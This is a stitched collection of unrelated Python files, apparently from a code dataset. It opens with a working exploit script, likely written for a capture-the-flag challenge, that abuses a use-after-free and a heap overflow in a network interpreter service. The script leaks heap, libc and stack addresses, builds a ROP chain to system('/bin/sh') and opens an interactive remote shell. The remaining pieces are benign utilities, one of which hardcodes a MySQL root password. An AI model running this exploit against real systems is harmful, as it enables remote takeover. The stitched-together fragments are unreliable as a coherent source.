COLOR_RED = '31'
COLOR_GREEN = '32'
COLOR_BROWN = '33'
COLOR_BLUE = '34'
COLOR_MAGENTA = '35'
COLOR_CYAN = '36'
COLOR_WHITE = '37'
CLEAR = '0'
UNDERLINE = '4'
BOLD = '1'
ESCAPE_START = '\033['
ESCAPE_END = 'm'
# TODO rename to style and append Term.Clear ?
def ansi(*args):
"""Construct an ANSI terminal escape code."""
code = Term.ESCAPE_START
code += ';'.join(args)
code += Term.ESCAPE_END
return code
class DisconnectException(Exception):
pass
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Pattern Generation
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Pattern:
"""De-Bruijn sequence generator."""
alphabet = string.digits + string.ascii_letters
def __init__(self, length):
if length <= len(self.alphabet):
self._seq = self.alphabet[:length]
elif length <= len(self.alphabet) ** 2:
self._seq = self._generate(2)[:length]
elif length <= len(self.alphabet) ** 3:
self._seq = self._generate(3)[:length]
elif length <= len(self.alphabet) ** 4:
self._seq = self._generate(4)[:length]
else:
raise Exception("Pattern length is way to large")
def _generate(self, n):
"""Generate a De Bruijn sequence."""
# See https://en.wikipedia.org/wiki/De_Bruijn_sequence
k = len(self.alphabet)
a = [0] * k * n
sequence = []
def db(t, p):
if t > n:
if n % p == 0:
sequence.extend(a[1:p + 1])
else:
a[t] = a[t - p]
db(t + 1, p)
for j in range(a[t - p] + 1, k):
a[t] = j
db(t + 1, t)
db(1, 1)
return ''.join(self.alphabet[i] for i in sequence)
def bytes(self):
"""Return this sequence as bytes."""
return e(self._seq)
def __str__(self):
"""Return this sequence as string."""
return self._seq
@bytes_and_strings_are_cool
def offset(self, needle):
"""Returns the index of 'needle' in this sequence.
'needle' should be of type string or bytes. If an integer is provided
it will be treated as 32-bit or 64-bit little endian number, depending
on its bit length.
"""
if isinstance(needle, int):
if needle.bit_length() <= 32:
needle = p32(needle)
else:
needle = p64(needle)
needle = d(needle)
idx = self._seq.index(needle)
if self._seq[idx+len(needle):].find(needle) != -1:
raise ValueError("Multiple occurances found!")
return idx
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Network
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Channel:
"""Convenience wrapper around a socket."""
OUTGOING_COLOR = Term.COLOR_RED
INCOMING_COLOR = Term.COLOR_BLUE
def __init__(self, sock, verbose):
self._s = sock
self._verbose = verbose
self._buf = bytearray()
def _prettyprint(self, data, outgoing):
"""Prettyprint the given data.
This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.
Everything else is converted to hex, then printed in bold and underline for visibility.
Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be
detected in arbitrary binary streams.
"""
TEXT = 0
BINARY = 1
# Various Thresholds for the heuristics below
X = 4
Y = 16
Z = 2
color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR
# Step 1: Tag every byte of the input stream with it's detected type.
parts = []
curr = ''
for b in data:
if is_printable(b):
parts.append((TEXT, b))
else:
parts.append((BINARY, b))
# Step 2: Merge neighboring bytes of the same type and convert the sequences to type bytes.
i = 0
mergedparts = []
while i < len(parts):
t = parts[i][0]
arr = [parts[i][1]]
j = i+1
while j < len(parts) and parts[j][0] == t:
arr.append(parts[j][1])
j += 1
i = j
# Heuristic: If there are Y ASCII bytes with the same value followed by Z ASCII bytes followed by binary data, treat the Z bytes as binary as well.
extra = []
if t == TEXT and len(arr) > Y and i < len(parts) - 1:
mid = len(arr) - Z - 1
start, end = mid, mid
char = arr[mid]
while start >= 0 and arr[start] == char:
start -= 1
while end < len(arr) and arr[end] == char:
end += 1
# start and end point outside the range of equal-valued characters now.
if end - start >= Y+2 and end < len(parts):
extra = arr[end:]
arr = arr[:end]
mergedparts.append((t, bytes(arr)))
if extra:
mergedparts.append((BINARY, bytes(extra)))
parts = mergedparts
# Step 3: Merge all parts and prepend the ansi terminal escape sequences for the given type.
buf = ''
last = None
for tag, value in parts:
# Heuristic: If there is an ASCII sequence of X bytes or less surrounded by binary data, treat those as binary as well.
if tag == TEXT and len(value) <= X and last == BINARY:
tag = BINARY
if tag == TEXT:
buf += ansi(Term.CLEAR) + ansi(color)
else:
buf += ansi(color, Term.BOLD, Term.UNDERLINE)
value = hexlify(value)
buf += d(value)
last = tag
buf += ansi(Term.CLEAR)
# Step 4: Print :)
print(buf, end='')
sys.stdout.flush()
def setVerbose(self, verbose):
"""Set verbosity of this channel."""
self._verbose = verbose
def recv(self, n=4096):
"""Return up to n bytes of data from the remote end.
Buffers incoming data internally.
NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.
"""
if len(self._buf) < n:
buf = self._s.recv(65536)
if not buf and not self._buf:
raise DisconnectException("Server disconnected.")
if self._verbose:
self._prettyprint(buf, False)
self._buf += buf
# This code also works if n > len(self._buf)
buf = self._buf[:n]
self._buf = self._buf[n:]
return buf
def recvn(self, n):
"""Return exactly n bytes of data from the remote end."""
data = []
while len(data) != n:
data.append(self.recv(1))
return b''.join(data)
@bytes_and_strings_are_cool
def recvtil(self, delim):
"""Read data from the remote end until delim is found in the data.
The first occurance of delim is included in the returned buffer.
"""
buf = b''
# TODO maybe not make this O(n**2)...
while not delim in buf:
buf += self.recv(1)
return buf
def recvregex(self, regex):
"""Receive incoming data until it matches the given regex.
Returns the match object.
IMPORTANT: Since the data is coming from the network, it's usually
a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function
will return as soon as 'addr: 0xf' is read. Instead, make sure to
end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\n'.
"""
if isinstance(regex, str):
regex = re.compile(regex)
buf = ''
match = None
while not match:
buf += d(self.recv(1))
match = regex.search(buf)
return match
def recvline(self):
"""Receive and return a line from the remote end.
The trailing newline character will be included in the returned buffer.
"""
return self.recvtil('\n')
def send(self, buf):
"""Send all data in buf to the remote end."""
if self._verbose:
self._prettyprint(buf, True)
self._s.sendall(buf)
def sendnum(self, n):
"""Send the string representation of n followed by a newline character."""
self.sendline(str(n))
@bytes_and_strings_are_cool
def sendline(self, l):
"""Prepend a newline to l and send everything to the remote end."""
self.send(l + b'\n')
def interact(self):
"""Interact with the remote end: connect stdout and stdin to the socket."""
# TODO maybe use this at some point: https://docs.python.org/3/library/selectors.html
self._verbose = False
try:
while True:
available, _, _ = select.select([sys.stdin, self._s], [], [])
for src in available:
if src == sys.stdin:
data = sys.stdin.buffer.read1(1024) # Only one read() call, otherwise this breaks when the tty is in raw mode
self.send(data)
else:
data = self.recv(4096)
sys.stdout.buffer.write(data)
sys.stdout.flush()
except KeyboardInterrupt:
return
except DisconnectException:
print_info("Server disconnected.")
return
#
# Telnet emulation
#
def telnet(shell='/bin/bash'):
"""Telnet emulation.
Opens a PTY on the remote end and connects the master side to the socket.
Then spawns a shell connected to the slave end and puts the controlling TTY
on the local machine into raw mode.
Result: Something similar to a telnet/(plaintext)ssh session.
Vim, htop, su, less, etc. will work with this.
!!! This function only works if the channel is connected to a shell !!!
"""
assert(sys.stdin.isatty())
c.setVerbose(False)
# Open a PTY and spawn a bash connected to the slave end on the remote side
code = 'import pty; pty.spawn([\'{}\', \'-i\'])'.format(shell)
sendline('python -c "{}"; exit'.format(code))
time.sleep(0.5) # No really good way of knowing when the shell has opened on the other side...
# Should maybe put some more functionality into the inline python code instead.
# Save current TTY settings
old_settings = termios.tcgetattr(sys.stdin.fileno())
# Put TTY into raw mode
tty.setraw(sys.stdin)
# Resize remote terminal
# Nice-to-have: also handle terminal resize
cols, rows = os.get_terminal_size(sys.stdin.fileno())
sendline('stty rows {} cols {}; echo READY'.format(rows, cols))
recvtil('READY\r\n') # terminal echo
recvtil('READY\r\n') # command output
interact()
# Restore previous settings
termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)
#
# Convenience wrappers that use the global socket instance
#
def send(b):
c.send(b)
def sendline(l):
c.sendline(l)
def sendnum(n):
c.sendnum(n)
def recv(n):
return c.recv(n)
def recvtil(delim):
return c.recvtil(delim)
def recvn(n):
return c.recvn(n)
def recvline():
return c.recvline()
def recvregex(r):
return c.recvregex(r)
def interact():
c.interact()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Setup
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
s = socket.create_connection(TARGET)
#s.settimeout(2)
c = Channel(s, NETDEBUG)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Your code here
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ALPHABET = 'abcdefghijklmnopqrstuvwxyz'
def evl(code):
sendline(code)
def readvar(name):
evl('=')
recvtil('Bad token: 0-1\n> ')
evl(name)
response = recvtil('> ')
return response.split(b'\n')[0]
def readintvar(name):
return int(d(readvar(name)))
def readstrvar(name):
return readvar(name)[1:-1]
def heapleak():
"""Free the lhs and rhs values during add_assign. ..."""
for i in range(16):
evl('{}'.format(i))
# Trigger heap info leak
evl('h=0+0')
return readintvar('h') & 0xfffffffffffff000
def gc(remaining):
"""Trigger gargabe collection"""
for i in range(remaining):
evl('{}'.format(i))
def leak(addr, length):
"""Leaks process memory by abusing the UAF to temporarily inject a fake string."""
fake_str_addr = heap_base + 0xb0
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"') # will be at offset 0xb0 from heap start
for i in range(15):
evl('{}'.format(i))
# 19 slots filled
# allocate 20th slot with integer value containing the addr of our fake string. The allocate_value() during do_add_assign triggers GC and frees the lhs value
# Then the output value is allocated into the same slot. Since the output value is String (type of x),
# lhs is turned into a string with controlled pointer
evl('a={}+x'.format(fake_str_addr))
gc(16)
return readstrvar('a')[0:length]
def leak2(addr, length):
"""Same as above, but different offsets..."""
fake_str_addr = heap_base + 0x170
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"') # will be at offset 0xb0 from heap start
for i in range(12):
evl('{}'.format(i))
evl('a={}+x'.format(fake_str_addr))
return readstrvar('a')[0:length]
def pwn():
global heap_base
recvtil('>')
evl('x="XXXXXXXXXXXXXXXX"') # Workaround, need global object or else GC will crash
# 2 slots always filled from now on (global object and int value 1337)
heap_base = heapleak()
# 3 slots always filled from now on
print_good("Heap base @ 0x{:x}".format(heap_base))
# Create a smallbin chunk so we can leak a libc pointer
evl('"{}"'.format('A' * 0x100))
gc(20 - 4)
# Leak freelist pointers pointing into the libc
heap_mem = leak(heap_base, 0x1000)
for i in range(0, len(heap_mem)-16, 8):
# Search for 2 consecutive pointers, those will be the flink and blink of the freed smallbin chunk
flink = u64(heap_mem[i:i+8])
blink = u64(heap_mem[i+8:i+16])
if (abs(flink - heap_base) > 0x10000 and
flink > 0x7f0000000000 and
flink < 0x800000000000 and
blink > 0x7f0000000000 and
blink < 0x800000000000):
break
else:
print_bad("No freelist pointers found :(")
return
libc = flink - 0x3c1928
print_good("libc @ 0x{:x}".format(libc))
# Leak stack pointer by reading environ pointer in libc
env_ptr = u64(leak2(libc + 0x3c44a0, 8))
print_good("stack @ 0x{:x}".format(env_ptr))
# Calculate addresses
system = libc + 0x46590
bin_sh = libc + 0x180103
pop_rdi = libc + 0x22b9a
pop_rsi = libc + 0x24885
pop_rdx = libc + 0x1b8e
add_rsp_0x48 = libc + 0xf5b8b
print_good("/bin/sh @ 0x{:x}".format(bin_sh))
input_buf = env_ptr - 0x328
print_good("input_buf @ 0x{:x}".format(input_buf))
ret_addr = env_ptr - 0x328 - 8
print_good("return address @ 0x{:x}".format(ret_addr))
# 5 slots always filled from now
#
# Heap spray with Property instances to get a controlled heap layout again
#
# Make some objects
evl('l.a=x')
evl('h.a=x')
evl('a.a=x')
evl('b.a=x')
evl('c.a=x')
evl('d.a=x')
evl('e.a=x')
evl('f.a=x')
# Trigger GC
for i in range(9):
evl('"{}"'.format('A' * 0x10))
evl('1337')
# 10 slots used
# Allocate lots of properties (but no values)
for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:
for p in ALPHABET:
evl('{}.{}=x'.format(o, p))
# Set up heap layout for unbounded heap overflow. We need the following layout:
# | chunk to overflow from | ... | Property to corrupt | ... | Fake string |
# We overflow into "Fake string" to set it's size to 0 and avoid a segfault.
for i in range(6):
evl('1337')
# Create some properties
for i in 'ghijk':
evl('{}=x'.format(i))
# Fake string with length 0xffffffXX => leads to an integer overflow during string_concat and subsequently a heap buffer overflow
fake_str = p64(0xffffffffffffffff - 0xf - (0x180 - 0x10)) + p64(0x414141414141) + b'D'*0xf0
evl(b'n="' + fake_str + b'"')
payload = b'\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 0x100) +p64(input_buf-7)
payload += b'\x00' * (0x180 - len(payload))
evl(b'o="' + payload + b'"')
fake_str_addr = heap_base + 0x1e80
# Trigger the overflow
evl('p=o+{}'.format(fake_str_addr))
# Set up a fake string property in the stack ('p' points to it). We need to leak the binary base from the return address
payload = b'A' * 0x100
payload += p64(1) + p64(input_buf + 16 + 0x100 + 0x18) + p64(0)
payload += p64(8) + p64(ret_addr)
evl(payload)
binary = readstrvar('p')
binary = u64(binary) - 2769
print_good("binary @ 0x{:x}".format(binary))
offset_to_ret = ret_addr - (input_buf & 0xffffffffffffff00)
print_good("offset to return address: 0x{:x}".format(offset_to_ret))
# Some unfortunate restrictions...
if offset_to_ret > 0x28 or offset_to_ret < 0:
print_bad("Bad offset")
return
prop_name = p64(binary + 0xAC9)[1]
if prop_name < ord('A') or prop_name > ord('z'):
print_bad("Bad propery name: {}".format(prop_name))
return
prop_name = chr(prop_name)
print_good("property name: {}".format(prop_name))
# Write ROP chain into stack
payload = b'A' * 56
payload += p64(pop_rdi)
payload += p64(bin_sh)
payload += p64(system)
validate(payload, [b'\n'])
evl(payload)
# Trigger corruption of InputBuffer.ptr to point further down in the stack
evl('{}=42'.format(prop_name))
# Next input will be written into the stack frame of readline(). Overwrite the return address with "add rsp, 0x48 ; ret"
payload = b'A'*offset_to_ret
payload += p64(add_rsp_0x48)
validate(payload, [b'\n'])
evl(payload)
# Wait a short while and drop into interactive mode == shell
time.sleep(0.5)
interact()
if __name__ == '__main__':
pwn()
|
7,652 | a6f242a0443ffbad835f86098b70ede41c03515b | import aiohttp
import asyncio
import base64
import discord
import json
from discord.ext import commands
class BasicMC(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.session = aiohttp.ClientSession()
@commands.command(name="stealskin", aliases=["skinsteal", "skin"])
@commands.cooldown(1, 4, commands.BucketType.user)
async def skinner(self, ctx, gamertag: str):
response = await self.session.get(f"https://api.mojang.com/users/profiles/minecraft/{gamertag}")
if response.status == 204:
await ctx.send(
embed=discord.Embed(color=await self.bot.cc(ctx.author.id), description="That player doesn't exist!"))
return
uuid = json.loads(await response.text()).get("id")
if uuid is None:
await ctx.send(
embed=discord.Embed(color=await self.bot.cc(ctx.author.id), description="That player doesn't exist!"))
return
response = await self.session.get(
f"https://sessionserver.mojang.com/session/minecraft/profile/{uuid}?unsigned=false")
content = json.loads(await response.text())
if "error" in content:
if content["error"] == "TooManyRequestsException":
await ctx.send(embed=discord.Embed(color=await self.bot.cc(ctx.author.id),
description="Oops, we're being ratelimited by the Mojang API, try again later!"))
return
if len(content["properties"]) == 0:
await ctx.send(embed=discord.Embed(color=await self.bot.cc(ctx.author.id),
description="We can't get this person's skin for some reason..."))
return
undec = base64.b64decode(content["properties"][0]["value"])
try:
url = json.loads(undec)["textures"]["SKIN"]["url"]
except Exception:
await ctx.send(
embed=discord.Embed(color=await self.bot.cc(ctx.author.id),
description="An error occurred while fetching that skin!"))
return
skin_embed = discord.Embed(color=await self.bot.cc(ctx.author.id),
description=f"{gamertag}'s skin\n[**[Download]**]({url})")
skin_embed.set_thumbnail(url=url)
skin_embed.set_image(url=f"https://mc-heads.net/body/{gamertag}")
await ctx.send(embed=skin_embed)
@commands.command(name="nametouuid", aliases=["uuid", "getuuid"])
@commands.cooldown(1, 2, commands.BucketType.user)
async def get_uuid(self, ctx, gamertag: str):
r = await self.session.post("https://api.mojang.com/profiles/minecraft", json=[gamertag])
j = json.loads(await r.text()) # [0]['id']
if not j:
await ctx.send(embed=discord.Embed(color=await self.bot.cc(ctx.author.id),
description="That user could not be found."))
return
await ctx.send(
embed=discord.Embed(color=await self.bot.cc(ctx.author.id), description=f"{gamertag}: ``{j[0]['id']}``"))
@commands.command(name="uuidtoname", aliases=["getgamertag"])
@commands.cooldown(1, 2, commands.BucketType.user)
async def get_gamertag(self, ctx, uuid: str):
response = await self.session.get(f"https://api.mojang.com/user/profiles/{uuid}/names")
if response.status == 204:
await ctx.send(
embed=discord.Embed(color=await self.bot.cc(ctx.author.id), description="That player doesn't exist!"))
return
j = json.loads(await response.text())
name = j[len(j) - 1]["name"]
await ctx.send(embed=discord.Embed(color=await self.bot.cc(ctx.author.id), description=f"{uuid}: ``{name}``"))
@commands.command(name="colorcodes", aliases=["mccolorcodes", "colors", "cc"])
async def mc_color_codes(self, ctx):
embed = discord.Embed(color=await self.bot.cc(ctx.author.id),
description="Text in Minecraft can be formatted using different codes and\nthe section (``§``) sign.")
embed.set_author(name="Minecraft Formatting Codes")
embed.add_field(name="Color Codes", value="<:red:697541699706028083> **Red** ``§c``\n"
"<:yellow:697541699743776808> **Yellow** ``§e``\n"
"<:green:697541699316219967> **Green** ``§a``\n"
"<:aqua:697541699173613750> **Aqua** ``§b``\n"
"<:blue:697541699655696787> **Blue** ``§9``\n"
"<:light_purple:697541699546775612> **Light Purple** ``§d``\n"
"<:white:697541699785719838> **White** ``§f``\n"
"<:gray:697541699534061630> **Gray** ``§7``\n")
embed.add_field(name="Color Codes", value="<:dark_red:697541699488055426> **Dark Red** ``§4``\n"
"<:gold:697541699639050382> **Gold** ``§6``\n"
"<:dark_green:697541699500769420> **Dark Green** ``§2``\n"
"<:dark_aqua:697541699475472436> **Dark Aqua** ``§3``\n"
"<:dark_blue:697541699488055437> **Dark Blue** ``§1``\n"
"<:dark_purple:697541699437592666> **Dark Purple** ``§5``\n"
"<:dark_gray:697541699471278120> **Dark Gray** ``§8``\n"
"<:black:697541699496444025> **Black** ``§0``\n")
embed.add_field(name="Formatting Codes", value="<:bold:697541699488186419> **Bold** ``§l``\n"
"<:strikethrough:697541699768942711> ~~Strikethrough~~ ``§m``\n"
"<:underline:697541699806953583> __Underline__ ``§n``\n"
"<:italic:697541699152379995> *Italic* ``§o``\n"
"<:obfuscated:697541699769204736> ||Obfuscated|| ``§k``\n"
"<:reset:697541699697639446> Reset ``§r``\n")
await ctx.send(embed=embed)
def setup(bot):
bot.add_cog(BasicMC(bot))
|
7,653 | 825c9510b055c0fa570f577b1c9616e8bde9c98b | from django.test import TestCase
from .models import Post, Category, Tag
# Create your tests here.
class TestPost(TestCase):
def test_str(self):
my_title = Post(title='This is a basic title for a basic test case')
self.assertEquals(str(my_title), 'This is a basic title for a basic test case')
class TestCategory(TestCase):
def test_str(self):
category = Category(name='Test Category')
self.assertEquals(str(category), 'Test Category')
class TestTag(TestCase):
def test_str(self):
tag = Tag(name='Test Tag')
self.assertEquals(str(tag), 'Test Tag')
|
7,654 | 37c42a5e52832c81660e88f45d93e6a9f0300de0 | class Node:
def __init__(self, char = None):
self.char = char
self.children = []
self.end = False
root = Node('*')
curr = root
# recursive insert into the trie
def insert(s, curr):
if curr.children and curr.children[0].char == s[0]:
curr = curr.children[0]
elif len(curr.children) > 1 and curr.children[1].char == s[0]:
curr = curr.children[1]
else:
new_node = Node(s[0])
curr.children.append(new_node)
curr = new_node
if len(s) > 1:
s = s[1:]
insert(s, curr)
else:
curr.end = True
# search for a string in the trie
def search(sequence):
tmp_node = root
found = False
for letter in sequence:
common = False
for child in tmp_node.children:
if child.char == letter:
tmp_node = child
common = True
break
if not common:
return found
if tmp_node.end:
found = True
return found
# user input
print('''Type any number of sequences containing only 2 types
of characters 'a' and 'b' to fill the database (ended by blank entry).''')
sequences = []
while True:
seq = input("Sequence: ")
if seq == '':
break
sequences.append(seq)
node_no = 0
letter = 'none'
# loads strings into the trie
for seq in sequences:
insert(seq, root)
print("Select 2 sequences from the database.")
# takes 2 strings from user to compare
seq1 = input("Sequence 1: ")
seq2 = input("Sequence 2: ")
if search(seq1) and search(seq2):
for i in range(min(len(seq1), len(seq2))):
if seq1[i] == seq2[i]:
node_no += 1
letter = seq1[i]
else:
break
print("Last common node is -", letter, "- with node no.", node_no)
else:
print("One or both the sequences not found in the database.")
|
7,655 | c8975306473dda49be6c5f19f6663214ec7e7105 | import numpy as np
import cPickle as pkl
data_l = []
data_path = "/home/marc/data/"
with open(data_path+'covtype.data') as fp:
for line in fp:
tmp_l = [ int(elem) for elem in line.split(',') ]
data_l.append(tmp_l)
data = np.array(data_l)
np.random.shuffle(data)
quintil = data.shape[0]/5
train_x = data[:quintil*3, :-1]
train_y = (data[:quintil*3, -1]-1).reshape((-1,1)).astype(int)
valid_x = data[quintil*3:quintil*4, :-1]
valid_y = (data[quintil*3:quintil*4, -1]-1).reshape((-1,1)).astype(int)
test_x = data[quintil*4:quintil*5, :-1]
test_y = (data[quintil*4:quintil*5, -1]-1).reshape((-1,1)).astype(int)
np.equal(data[:,-1],np.ones(data[:,-1].shape)).sum()
np.equal(data[:,-1],np.ones(data[:,-1].shape)+1).sum()
np.equal(data[:,-1],np.ones(data[:,-1].shape)+2).sum()
dss = [train_x, train_y, valid_x, valid_y, test_x , test_y]
names = ["train_x", "train_y", "valid_x", "valid_y", "test_x", "test_y"]
for ds,name in zip(dss, names):
f = open(data_path+"COV_"+name+".pkl", "wb")
pkl.dump(ds,f) |
7,656 | c6ce6ffe46be993bfe74ccb240e1ebf586c9f556 | import numpy as np
from math import sqrt
import warnings
from collections import Counter
import pandas as pd
import random
def k_NN(data, predict, k=3):
if len(data) >= k:
warnings.warn("K is set to a value less than total voting groups !")
distances = []
[[ distances.append([np.linalg.norm(np.array(features) - np.array(predict)), group]) for features in data[group]] for group in data]
votes = [i[1] for i in sorted(distances)[:k]]
vote_result = Counter(votes).most_common(1)[0][0]
confidence = Counter(votes).most_common(1)[0][1] / k
return vote_result, confidence
df = pd.read_csv("breast-cancer-wisconsin.data.txt")
df.replace('?', -99999, inplace=True)
df.drop(df.columns[[0]], 1, inplace=True)
full_data = df.astype(float).values.tolist()
random.shuffle(full_data)
test_size = 0.2
train_set = {2: [], 4: []}
test_set = {2: [], 4: []}
train_data = full_data[:-int(test_size*len(full_data))]
test_data = full_data[-int(test_size*len(full_data)):]
[ train_set[i[-1]].append(i[:-1]) for i in train_data ]
[ test_set[i[-1]].append(i[:-1]) for i in test_data ]
correct = 0
total = 0
confidences = []
for group in test_set:
for data in test_set[group]:
vote, confidence = k_NN(train_set, data, k=3)
if group == vote:
correct += 1
total += 1
confidences.append(confidence)
print('Accuracy:', correct/total, 'Average confidence', (sum(confidences)/len(confidences))) |
7,657 | d287a5128ca9352b2edc459c9e42a57ef800ec9c | #!/usr/bin/python
import sys
def get_params(fname):
d = dict()
with open(fname) as f:
for line in f:
l = line.strip()
if (line[0] == '#'):
continue
param = line.split('=')
v = ' '.join(param[1:])
d[param[0]] = v.strip('\n')
return d
usage_text = "Compares boot configs of two kernels\n" \
"Usage: {0} <filename1> <filename2>".format(sys.argv[0])
try:
f1 = sys.argv[1]
f2 = sys.argv[2]
except:
print usage_text
exit()
params1 = get_params(f1)
params2 = get_params(f2)
param_names = set([key for key in params1]) | set([key for key in params2])
the_first = True
f_output = "{0:80}{1:40}{2:40}"
for param in param_names:
try:
val1 = params1[param]
except KeyError:
val1 = '-'
try:
val2 = params2[param]
except KeyError:
val2 = '-'
if (val1 != val2):
if the_first:
print(f_output.format("Param name", f1, f2))
print "-"*140
the_first = False
print (f_output.format(param, val1, val2))
|
7,658 | 2b3a7d0c28d1bf7d4400b0e5558b0527a96af781 | import sys
import math
from random import randrange
from utilities import *
from EffectiveThueLemma import *
def getZ(value):
s = str(value)
p10 = 1
if s[0] != '0':
p10 = 10
for i in range(1, len(s)):
if s[i] == '.':
break
p10 *= 10
z = []
first = int(s[0] == '0')
for i in range(first, len(s)):
if s[i] != '.':
z.append(int(s[i]))
return (p10, z)
def Theorem4_9(n, b, R):
if R >= n:
raise ValueError("r* >= n")
if b < 0 or b >= n:
raise ValueError("b < 0 or b >= n")
r, rr = n, b # r0, r1
s, ss = 1, 0 # s0, s1
t, tt = 0, 1 # t0, t1
if r < R:
return (r, s, t)
if rr < R:
return (rr, ss, tt)
while rr != 0:
q = r/rr
rrr = r % rr
r, s, t, rr, ss, tt = rr, ss, tt, rrr, (s-ss*q), (t-tt*q)
if rr < R:
return (rr, ss, tt)
return None
def gcd(a, b):
if b == 0:
return a
return gcd(b, a%b)
def RationalReconstruction(value, M = int(1e9)):
# check if value is already an integer
if value.is_integer():
return (value, 1)
# get additional 10^x and z array
p10, z = getZ(value)
print(z)
k = len(z)
# 1. Compute n = 10^k and b = sum(z(i-1) * 10^(k-i)) with i = 1..k
n = pow(10, k)
b = 0
for i in range(1, k+1):
b += z[i-1] * pow(10, k-i)
# make sure 10^k > 2(M^2)
while M >= 10 and 2*(M**2) >= n:
M /= 10
# 2. Run the extended Euclidean algorithm on input n, b to obtain EEA(n, b)
# and then apply Theorem 4.9 with n, b, and r* = t* = M to obtain the values r', s', t'.
EEA(n, b)
print(n, b, M)
rr, ss, tt = Theorem4_9(n, b, M)
# 3. Output the rational number -s'/t'
if tt < 0:
ss, tt = -ss, -tt
ss *= p10
g = gcd(abs(ss), abs(tt))
ss /= g
tt /= g
return (-ss, tt)
def main():
if (len(sys.argv) < 2):
return
value = float(sys.argv[1])
M = int(1e9)
if len(sys.argv) > 2:
M = int(sys.argv[2])
p, q = RationalReconstruction(value, M)
print("p = %ld" %(p))
print("q = %ld" %(q))
print("p/q = %.20lf" %(1.0*p/q))
print("val = %.20lf" %(value))
main() |
7,659 | 1cf4fc37e030a895cb36f537ce9e92df34acfb8b | """
Counted List
Create a class for an list like object based on UserList wrapper
https://docs.python.org/3/library/collections.html#collections.UserList
That object should have a method to return a Counter
https://docs.python.org/3/library/collections.html#collections.Counter
for all objects in the list
Counter should be updated automatically for at lest 2 methods (append, pop)
"""
# example to test code
# class Example(UserList)
# ...
#
# x = Example(['1', '2', '3'])
# y = x.get_counter() # y contains Counter({'1':1, '2':1 '3':1})
# x.append(3)
# now y contains Counter({'1':1, '2':1 '3':2})
from collections import UserList,Counter
class CountedList(UserList):
def Count(self):
self.cnt=Counter(self.data)
return self.cnt
def append(self, item):
super(CountedList,self).append(item)
global y
y = self.Count()
countedlist=CountedList(['1', '2', '3'])
y=countedlist.Count()
print(y)
countedlist.append('3')
print(y)
|
7,660 | 62bad8eeb3b51a5012dad761a60639d36429d8e8 | import pymysql
from app_module.models import User, Vehicle, Address, Customer, Location, Coupon, VehicleClass, Corporation, Corporate
from datetime import datetime
HOSTNAME = 'localhost'
USERNAME = 'root'
PASSWORD = '123456'
DATABASE = 'proj_p2'
def get_connection():
my_sql_connection = pymysql.connect(host=HOSTNAME, user=USERNAME, passwd=PASSWORD, db=DATABASE)
return my_sql_connection
def run_query(query, args=None):
conn = get_connection()
cur = conn.cursor()
cur.execute(query, args)
rs = cur.fetchall()
if (len(rs) != 0):
return rs
conn.commit()
cur.close()
conn.close()
def insert_address(address_obj):
run_query('''insert into zlrz_address (state, city, street, zipcode) values (%s, %s, %s, %s)'''
, (address_obj.state, address_obj.city, address_obj.street, int(address_obj.zipcode)))
rs = run_query('''select * from zlrz_address where state = %s and city = %s and street=%s and zipcode=%s'''
, (address_obj.state, address_obj.city, address_obj.street, int(address_obj.zipcode)))
return rs[0][0]
def insert_customer(customer_obj):
run_query('''insert into zlrz_customer (cust_type, firstname, lastname, cust_email, cust_phonenum, addr_id,
username, password) values (%s, %s, %s, %s, %s, %s, %s, %s) '''
, (customer_obj.cust_type, customer_obj.first_name, customer_obj.last_name, customer_obj.cust_email,
customer_obj.cust_phonenum, customer_obj.address_id, customer_obj.username, customer_obj.password))
rs = run_query(
'''select * from zlrz_customer where firstname = %s and lastname = %s and cust_email = %s and cust_phonenum = %s order by cust_id desc'''
, (customer_obj.first_name, customer_obj.last_name, customer_obj.cust_email, customer_obj.cust_phonenum))
return rs[0][0]
def insert_vehicle(vehicle_obj):
run_query('''insert into zlrz_vehicle (veh_make, veh_model, veh_year, veh_vin, veh_license, vc_num, ol_id) values
(%s, %s, %s, %s, %s, %s, %s) '''
, (
vehicle_obj.make, vehicle_obj.model, int(vehicle_obj.year), vehicle_obj.vin_num, vehicle_obj.license_num,
vehicle_obj.class_num, vehicle_obj.location_id))
rs = run_query('''select * from zlrz_vehicle where veh_make = %s and veh_model = %s and veh_year = %s and veh_vin
= %s and veh_license = %s and vc_num = %s and ol_id = %s '''
, (vehicle_obj.make, vehicle_obj.model, int(vehicle_obj.year), vehicle_obj.vin_num,
vehicle_obj.license_num, vehicle_obj.class_num, vehicle_obj.location_id))
return rs[0][0]
def insert_vehicle_class(class_obj):
run_query('''insert into zlrz_vehicle_class (vc_name, vc_rateperday, vc_feeovermile) values (%s, %s, %s)'''
, (class_obj.vc_name, int(class_obj.vc_rateperday), int(class_obj.vc_feeovermile)))
rs = run_query('''select * from zlrz_vehicle_class where vc_name = %s and vc_rateperday = %s and vc_feeovermile =
%s '''
, (class_obj.vc_name, int(class_obj.vc_rateperday), int(class_obj.vc_feeovermile)))
return rs[0][0]
def insert_office_location(location_obj):
run_query('''insert into zlrz_office_location (ol_phonenum, ol_state, ol_city, ol_street, ol_zipcode) values (%s,
%s, %s, %s, %s) '''
, (location_obj.phone, location_obj.state, location_obj.city, location_obj.street,
int(location_obj.zipcode)))
rs = run_query('''select * from zlrz_office_location where ol_phonenum = %s and ol_state = %s and ol_city = %s
